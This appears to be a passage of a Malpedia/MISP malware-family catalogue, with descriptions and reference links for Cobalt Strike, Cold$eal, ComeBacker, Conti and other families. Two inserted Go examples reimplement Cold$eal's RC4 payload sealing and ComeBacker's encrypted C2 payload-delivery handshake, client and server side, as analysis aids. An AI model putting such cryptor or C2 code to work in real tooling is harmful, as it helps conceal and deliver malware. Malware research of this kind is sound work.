https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encoding-decoding/

https://michaelkoczwara.medium.com/cobalt-strike-hunting-dll-hijacking-attack-analysis-ffbf8fd66a4e

https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/

https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf

https://twitter.com/Unit42_Intel/status/1458113934024757256

https://blog.nviso.eu/2021/11/03/cobalt-strike-using-process-memory-to-decrypt-traffic-part-3/

https://twitter.com/AltShiftPrtScn/status/1350755169965924352

https://twitter.com/AltShiftPrtScn/status/1403707430765273095

http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf

https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/

https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive

https://www.proofpoint.com/us/blog/threat-insight/cobalt-strike-favorite-tool-apt-crimeware

https://morphuslabs.com/attackers-are-abusing-msbuild-to-evade-defenses-and-implant-cobalt-strike-beacons-edac4ab84f42

https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html

https://www.malware-traffic-analysis.net/2021/09/29/index.html

https://blogs.blackberry.com/en/2021/10/blackberry-shines-spotlight-on-evolving-cobalt-strike-threat-in-new-book

https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html

https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv

https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html

https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/

https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/

https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love

https://www.mandiant.com/resources/sabbath-ransomware-affiliate

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/

https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://www.intezer.com/blog/malware-analysis/cobalt-strike-detect-this-persistent-threat/

https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1

https://x.com/embee_research/status/1736758775326146778

https://connormcgarr.github.io/thread-hijacking/

https://www.brighttalk.com/webcast/7451/462719

https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c

https://www.arashparsa.com/hook-heaps-and-live-free/

https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures

https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2

https://blog.nviso.eu/2021/11/17/cobalt-strike-decrypting-obfuscated-traffic-part-4/

https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/

https://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/

https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py

https://www.secureworks.com/research/threat-profiles/gold-dupont

https://elastic.github.io/security-research/intelligence/2022/01/03.extracting-cobalt-strike-beacon/article/

https://www.deepinstinct.com/2021/03/18/cobalt-strike-post-exploitation-attackers-toolkit/

https://labs.k7computing.com/index.php/cobalt-strikes-deployment-with-hardware-breakpoint-for-amsi-bypass/

https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf

https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/

https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one

https://blog.morphisec.com/log4j-exploit-hits-again-vulnerable-vmware-horizon-servers-at-risk

https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/

https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure

https://isc.sans.edu/diary/rss/28448

https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html

https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/

https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/

https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html

https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir

https://www.arashparsa.com/catching-a-malware-with-no-name/

https://blog.nviso.eu/2021/04/26/anatomy-of-cobalt-strike-dll-stagers/

https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-148a

https://explore.group-ib.com/htct/hi-tech_crime_2018

https://isc.sans.edu/diary/rss/28664

https://blog.zsec.uk/cobalt-strike-profiles/

https://www.secureworks.com/research/threat-profiles/gold-waterfall

https://github.com/dodo-sec/Malware-Analysis/blob/main/Cobalt%20Strike/Indirect%20Syscalls.md

https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/

https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html

https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/

https://elastic.github.io/security-research/intelligence/2022/01/02.collecting-cobalt-strike-beacons/article/

https://securityscorecard.com/blog/securityscorecard-finds-usaid-hack-much-larger-than-initially-thought

https://blog.nviso.eu/2021/10/27/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-2/

https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/

https://grimminck.medium.com/spoofing-jarm-signatures-i-am-the-cobalt-strike-server-now-a27bd549fc6b

https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/

https://redcanary.com/blog/getsystem-offsec/

https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/

https://bmcder.com/blog/cobalt-strike-dfir-listening-to-the-pipes

https://www.netresec.com/?page=Blog&month=2024-01&post=Hunting-for-Cobalt-Strike-in-PCAP

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/sneak-peek-ch1-2-finding-beacons-in-the-dark.pdf

https://services.google.com/fh/files/blogs/gcat_threathorizons_full_jul2023.pdf

https://isc.sans.edu/diary/rss/26862

https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/

https://intel471.com/blog/shipping-companies-ransomware-credentials

https://thehackernews.com/2022/05/malware-analysis-trickbot.html

https://embee-research.ghost.io/combining-pivot-points-to-identify-malware-infrastructure-redline-smokeloader-and-cobalt-strike/

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a

https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang

https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9

https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/

CobInt

CobInt is a backdoor developed by the Cobalt group itself. The modular tool can collect initial reconnaissance information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor downloads and launches a Cobalt Strike framework stager. Its CRM mailslot module was also observed being downloaded by ISFB.

The tag is: misp-galaxy:malpedia="CobInt"

CobInt is also known as:

  • COOLPANTS

Table 3176. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint

https://www.netscout.com/blog/asert/double-infection-double-fun

https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

http://www.secureworks.com/research/threat-profiles/gold-kingswood

https://www.secureworks.com/research/threat-profiles/gold-kingswood

https://www.group-ib.com/blog/renaissance

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/cobalt_upd_ttps/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://asert.arbornetworks.com/double-the-infection-double-the-fun/

CockBlocker

The tag is: misp-galaxy:malpedia="CockBlocker"

CockBlocker is also known as:

Table 3178. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cockblocker

https://twitter.com/JaromirHorejsi/status/817311664391524352

CodeKey

The tag is: misp-galaxy:malpedia="CodeKey"

CodeKey is also known as:

Table 3179. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.codekey

https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf

CodeCore

Ransomware.

The tag is: misp-galaxy:malpedia="CodeCore"

CodeCore is also known as:

Table 3180. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.code_core

https://medium.com/s2wblog/%E5%8F%98%E8%84%B8-teng-snake-a-k-a-code-core-8c35268b4d1a

Coinminer

Coinminer is unwanted malicious software that uses the victim's computational resources (mostly CPU and RAM) to mine cryptocurrency (for example Monero or Zcash). The malware achieves persistence by registering one of the open-source miners to run at startup, without the victim's consent. More sophisticated coin miners use timers or cap their CPU usage in order to remain stealthy.

The tag is: misp-galaxy:malpedia="Coinminer"

Coinminer is also known as:

Table 3182. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer

https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/

https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html

https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/

https://secrary.com/ReversingMalware/CoinMiner/

https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://www.triskelelabs.com/investigating-monero-coin-miner

Cold$eal

Cold$eal is a packer for encrypting ("sealing") malware. It contains some AV-evasion techniques as well as some sandbox detection. It was developed by $@dok (aka Sadok, aka Coldseal). It was available as a cryptor service under the URL coldseal.us and was later sold as a toolkit consisting of the cryptor and a custom-made cryptostub, including a FUD (fully undetectable) guarantee backed by free updates to the cryptostub. The payload was encrypted using RC4 and added to the cryptostub as a resource; the encryption key itself was stored inside that resource as well. On start, the cryptostub would extract the key, decrypt the payload and perform a self-injection of the now decrypted payload. Note: the packed sample provided contains a harmless payload, while the unpacked sample is the bare cryptostub without a payload.
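The stub's unpacking path described above, as an added example that is not part of the Malpedia entry or of the Cold$eal toolkit: Seal models the cryptor, Unseal models what the stub does at start-up (minus the self-injection), and the "MZ" check is the sanity test an analyst applies before trusting a recovered payload. The resource layout (a length byte, then the key, then the RC4 ciphertext), the key and the payload bytes are all assumptions made up for this example; the page only states that the key is stored inside the same resource as the payload.

```go
package main

import (
	"bytes"
	"crypto/rc4"
	"errors"
	"fmt"
)

// ASSUMED resource layout (the page only says the RC4 key sits inside the same
// resource as the sealed payload):
//   [1 byte: key length n][n bytes: RC4 key][rest: RC4(payload)]

// Seal is the cryptor side: it encrypts the payload and embeds the key next to it.
func Seal(key, payload []byte) ([]byte, error) {
	if len(key) == 0 || len(key) > 255 {
		return nil, errors.New("key must be 1..255 bytes to fit the length byte")
	}
	c, err := rc4.NewCipher(key)
	if err != nil {
		return nil, err
	}
	out := make([]byte, 1+len(key)+len(payload))
	out[0] = byte(len(key))
	copy(out[1:], key)
	c.XORKeyStream(out[1+len(key):], payload)
	return out, nil
}

// Unseal replays what the stub does at start-up: read the key out of the resource
// and decrypt. It refuses the result unless it starts with "MZ", the sanity check
// an analyst wants before dumping a recovered payload to disk.
func Unseal(resource []byte) ([]byte, error) {
	if len(resource) < 2 {
		return nil, errors.New("resource too short to hold a key")
	}
	n := int(resource[0])
	if n == 0 || 1+n >= len(resource) {
		return nil, errors.New("key length byte does not fit the resource")
	}
	c, err := rc4.NewCipher(resource[1 : 1+n])
	if err != nil {
		return nil, err
	}
	plain := make([]byte, len(resource)-1-n)
	c.XORKeyStream(plain, resource[1+n:])
	if !bytes.HasPrefix(plain, []byte("MZ")) {
		return nil, errors.New("decrypted data is not a PE image: wrong layout or key")
	}
	return plain, nil
}

func main() {
	// Constructed stand-in for a packed payload; a real sample would carry a full PE.
	sealed, err := Seal([]byte("demo-key"), []byte("MZ\x90\x00 constructed payload"))
	if err != nil {
		panic(err)
	}
	plain, err := Unseal(sealed)
	fmt.Printf("%q %v\n", plain, err)
}
```

Because the key travels with the ciphertext, the same Unseal logic works statically on a resource carved out of the stub with a PE resource parser; nothing has to be executed. The "MZ" check is what separates a wrong layout guess from a correct one when iterating over candidate offsets.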

The tag is: misp-galaxy:malpedia="Cold$eal"

Cold$eal is also known as:

  • ColdSeal

Table 3185. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.coldseal

https://www.xylibox.com/2012/01/cracking-coldeal-541-fwb.html

https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/

http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/

https://www.xylibox.com/2012/01/coldeal-situation-is-under-control.html

https://www.youtube.com/watch?v=242Tn0IL2jE

ColdStealer

ColdStealer is a relatively new malicious program that was discovered in 2022. Like many other stealers, its main purpose is to steal credentials and information from web browsers; it also steals cryptocurrency wallets, FTP credentials, various files, system information such as OS version, system language and processor type, and clipboard data. Instead of writing the collected data to files, the stealer assembles it into a ZIP archive in memory, so no staging files or execution traces are left on disk for file-based detection to find. The only known method of delivering the stolen data is sending that ZIP archive to the hardcoded command and control (C2) server.

The tag is: misp-galaxy:malpedia="ColdStealer"

ColdStealer is also known as:

Table 3186. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.coldstealer

https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/

https://asec.ahnlab.com/ko/31703/

https://asec.ahnlab.com/en/32090/

Colibri Loader

According to CloudSEK, Colibri Loader is malware designed to install additional malware on an already compromised system. The loader employs several techniques to evade detection and hinder analysis, such as shipping without an Import Address Table (IAT) and keeping its strings encrypted. Like other loaders, Colibri can be used to deploy information-stealing malware, potentially leading to significant loss of sensitive data, so users should exercise caution when encountering unfamiliar files on their systems.

The tag is: misp-galaxy:malpedia="Colibri Loader"

Colibri Loader is also known as:

Table 3187. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.colibri

https://cloudsek.com/in-depth-technical-analysis-of-colibri-loader-malware/

https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/

https://fr3d.hk/blog/colibri-loader-back-to-basics

https://www.bitsight.com/blog/unpacking-colibri-loader-russian-apt-linked-campaign

https://github.com/Casperinous/colibri_loader

https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf

Collection RAT

The tag is: misp-galaxy:malpedia="Collection RAT"

Collection RAT is also known as:

Table 3188. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.collection_rat

https://blog.talosintelligence.com/lazarus-collectionrat/

ComeBacker

ComeBacker was found in a backdoored Visual Studio project that was used to target security researchers in Q4 2020 and early 2021.

It is an HTTP(S) downloader.

It uses AES in CBC mode, implemented through OpenSSL's EVP interface, to decrypt its configuration and to encrypt and decrypt the client-server communication.

The parameter names in the client's HTTP POST requests are generated randomly. On the initial connection the client exchanges keys with the server via the Diffie–Hellman key agreement protocol on the elliptic curve secp521r1. The client generates a random 32-byte private key, and the server responds with its public key in a buffer starting with the wide character "0".

Next, the client sends the current local time, and the server responds with a buffer containing multiple values separated by the pipe symbol. The typical values are the encrypted payload, the export to execute, and the MD5 hash of the decrypted DLL, which the client uses to check that the payload decrypted correctly (MD5 gives an integrity check here, not authentication of the server).

There are variants of ComeBacker without statically linked OpenSSL. In that case, the key exchange is omitted and AES CBC is replaced with HC-256.
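The key exchange and the pipe-separated payload reply described above, as an added example in Go that is not part of the Malpedia entry or of the ComeBacker sample: two Peers (client and server) do ECDH on secp521r1, the server frames its public key behind the wide character "0", serves "<encrypted payload>|<export>|<MD5>", and the client refuses any stage whose decrypted MD5 does not match. The KDF (SHA-256 of the shared secret), the prepended IV, PKCS#7 padding and hex encoding of the payload field are assumptions; the page does not describe them. The example uses the library's full-size P-521 private key rather than the 32-byte key the page reports, and the HC-256 variant without OpenSSL is not modelled.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/ecdh"
	"crypto/md5"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// The page says the server's key-exchange reply begins with the wide character "0"
// (UTF-16LE 0x30 0x00). ASSUMPTION: the raw uncompressed P-521 point follows it.
var wideZero = []byte{0x30, 0x00}

type Peer struct {
	priv *ecdh.PrivateKey
	key  []byte
}

func NewPeer() (*Peer, error) {
	priv, err := ecdh.P521().GenerateKey(rand.Reader) // secp521r1, as on the page
	return &Peer{priv: priv}, err
}

// KeyReply is the server's framed answer; the client posts the bare point instead.
func (p *Peer) KeyReply() []byte { return append(append([]byte{}, wideZero...), p.priv.PublicKey().Bytes()...) }

// Agree finishes ECDH with the other side's point. ASSUMPTION: the KDF is undocumented, SHA-256 stands in.
func (p *Peer) Agree(point []byte) error {
	pub, err := ecdh.P521().NewPublicKey(bytes.TrimPrefix(point, wideZero)) // bare points start with 0x04
	if err != nil {
		return err
	}
	secret, err := p.priv.ECDH(pub)
	if err != nil {
		return err
	}
	k := sha256.Sum256(secret)
	p.key = k[:]
	return nil
}

// PayloadReply is the server's second answer: "<payload>|<export>|<md5 of plain DLL>".
// ASSUMPTIONS: PKCS#7 padding, random IV prepended, hex encoding; the page fixes only the fields.
func (p *Peer) PayloadReply(dll []byte, export string) (string, error) {
	block, err := aes.NewCipher(p.key)
	if err != nil {
		return "", err
	}
	n := aes.BlockSize - len(dll)%aes.BlockSize
	padded := append(append([]byte{}, dll...), bytes.Repeat([]byte{byte(n)}, n)...)
	out := make([]byte, aes.BlockSize+len(padded))
	if _, err := rand.Read(out[:aes.BlockSize]); err != nil {
		return "", err
	}
	cipher.NewCBCEncrypter(block, out[:aes.BlockSize]).CryptBlocks(out[aes.BlockSize:], padded)
	sum := md5.Sum(dll)
	return hex.EncodeToString(out) + "|" + export + "|" + hex.EncodeToString(sum[:]), nil
}

// ParseReply is the client side: split, decrypt, unpad, and refuse the stage unless the MD5 matches.
func (p *Peer) ParseReply(reply string) ([]byte, string, error) {
	parts := strings.Split(reply, "|")
	if len(parts) != 3 {
		return nil, "", errors.New("expected 3 pipe-separated fields")
	}
	blob, err := hex.DecodeString(parts[0])
	if err != nil {
		return nil, "", err
	}
	block, err := aes.NewCipher(p.key)
	if err != nil || len(blob) < 2*aes.BlockSize || len(blob)%aes.BlockSize != 0 {
		return nil, "", errors.New("no session key, or ciphertext is not whole blocks")
	}
	plain := make([]byte, len(blob)-aes.BlockSize)
	cipher.NewCBCDecrypter(block, blob[:aes.BlockSize]).CryptBlocks(plain, blob[aes.BlockSize:])
	n := int(plain[len(plain)-1])
	if n == 0 || n > aes.BlockSize {
		return nil, "", errors.New("bad PKCS#7 padding")
	}
	plain = plain[:len(plain)-n]
	if sum := md5.Sum(plain); hex.EncodeToString(sum[:]) != parts[2] {
		return nil, "", errors.New("MD5 of decrypted DLL does not match the reply")
	}
	return plain, parts[1], nil
}

func main() {
	srv, _ := NewPeer()
	cli, _ := NewPeer()
	_, _ = srv.Agree(cli.priv.PublicKey().Bytes()), cli.Agree(srv.KeyReply())
	reply, _ := srv.PayloadReply([]byte("MZ constructed stand-in for a DLL"), "Run")
	fmt.Println(cli.ParseReply(reply))
}
```

The MD5 branch is the one to keep in mind when building a replay harness for captured traffic: a stage that decrypts to the wrong bytes under a guessed key or KDF fails there, before anything is loaded, which is also why the real implant can ship the hash in the clear without weakening the channel.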

The tag is: misp-galaxy:malpedia="ComeBacker"

ComeBacker is also known as:

Table 3193. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.comebacker

http://blog.nsfocus.net/stumbzarus-apt-lazarus/

https://cn.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf

https://download.hauri.net/DownSource/down/dwn_detail_down.html?uid=55

https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/

https://norfolkinfosec.com/dprk-malware-targeting-security-researchers/

https://www.anquanke.com/post/id/230161

https://norfolkinfosec.com/dprk-targeting-researchers-ii-sys-payload-and-registry-hunting/

https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/

https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/

Comfoo

The tag is: misp-galaxy:malpedia="Comfoo"

Comfoo is also known as:

Table 3194. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.comfoo

https://www.secureworks.com/research/secrets-of-the-comfoo-masters

ComLook

ComLook is a malicious plugin for the mail client "The Bat!", written in C++ and compiled with MSVC 10.0. It implements malicious commands like PutFile, GetFile, SetConfig, GetConfig, and Command. It contains hard-coded email addresses and other information, indicating a target in Azerbaijan. It was first uploaded to VirusTotal on January 12, 2022, and is associated with the APT group Turla. It appears to be a targeted deployment.

The tag is: misp-galaxy:malpedia="ComLook"

ComLook is also known as:

Table 3195. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.comlook

https://twitter.com/ClearskySec/status/1484211242474561540

https://www.msreverseengineering.com/blog/2022/1/25/an-exhaustively-analyzed-idb-for-comlook

ComradeCircle

The tag is: misp-galaxy:malpedia="ComradeCircle"

ComradeCircle is also known as:

Table 3200. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.comrade_circle

https://twitter.com/struppigel/status/816926371867926528

Conti (Windows)

Conti is an extremely damaging ransomware due to the speed with which it encrypts data and spreads to other systems. It was first observed in 2020 and it is thought to be led by a Russia-based cybercrime group that goes under the Wizard Spider pseudonym. In early May 2022, the US government announced a reward of up to $10 million for information on the Conti ransomware gang.

The tag is: misp-galaxy:malpedia="Conti (Windows)"

Conti (Windows) is also known as:

Table 3204. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.conti

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://cocomelonc.github.io/investigation/2022/03/27/malw-inv-conti-1.html

https://www.youtube.com/watch?v=hmaWy9QIC7c

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf

https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/

https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html

https://www.bleepingcomputer.com/news/security/hhs-conti-ransomware-encrypted-80-percent-of-irelands-hse-it-systems/

https://news.sophos.com/en-us/2022/02/22/cyberthreats-during-russian-ukrainian-tensions-what-can-we-learn-from-history-to-be-prepared/

https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://unit42.paloaltonetworks.com/conti-ransomware-gang/

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf

https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728

https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider

https://www.prevailion.com/what-wicked-webs-we-unweave/

https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks

https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.zscaler.com/blogs/security-research/conti-ransomware-attacks-persist-updated-version-despite-leaks

https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked

https://intel471.com/blog/conti-leaks-cybercrime-fire-team

https://us-cert.cisa.gov/ncas/alerts/aa21-265a

https://medium.com/@lcam/lighting-the-exfiltration-infrastructure-of-a-lockbit-affiliate-and-more-f57fbb7a4e79

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/

https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/

https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/

https://www.mbsd.jp/research/20210413/conti-ransomware/

https://arcticwolf.com/resources/blog/conti-ransomware-leak-analyzed

https://www.elliptic.co/blog/conti-ransomware-nets-at-least-25.5-million-in-four-months

https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement

https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf

https://github.com/cdong1012/ContiUnpacker

https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573

https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware

https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel

https://medium.com/@arnozobec/analyzing-conti-leaks-without-speaking-russian-only-methodology-f5aecc594d1b

https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/

https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru

https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html

https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/

https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems

https://www.hse.ie/eng/services/publications/conti-cyber-attack-on-the-hse-full-report.pdf

https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf

https://news.sophos.com/en-us/2021/02/16/what-to-expect-when-youve-been-hit-with-conti-ransomware/

https://twitter.com/TheDFIRReport/status/1498642512935800833

https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf

https://thedfirreport.com/2021/05/12/conti-ransomware/

https://damonmccoy.com/papers/Ransomware_eCrime22.pdf

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks

https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022

http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf

https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles

https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/

https://www.bleepingcomputer.com/news/security/angry-conti-ransomware-affiliate-leaks-gangs-attack-playbook/

https://www.connectwise.com/resources/conti-profile

https://www.darktrace.com/en/blog/the-double-extortion-business-conti-ransomware-gang-finds-new-avenues-of-negotiation/

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://assets.sentinelone.com/ransomware-enterprise/conti-ransomware-unpacked

https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf

https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://news.sophos.com/en-us/2021/02/16/conti-ransomware-attack-day-by-day/

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098

https://twitter.com/AltShiftPrtScn/status/1417849181012647938

https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://cocomelonc.github.io/investigation/2022/04/11/malw-inv-conti-2.html

https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/

https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations

https://yoroi.company/research/conti-ransomware-source-code-a-well-designed-cots-ransomware/

https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/

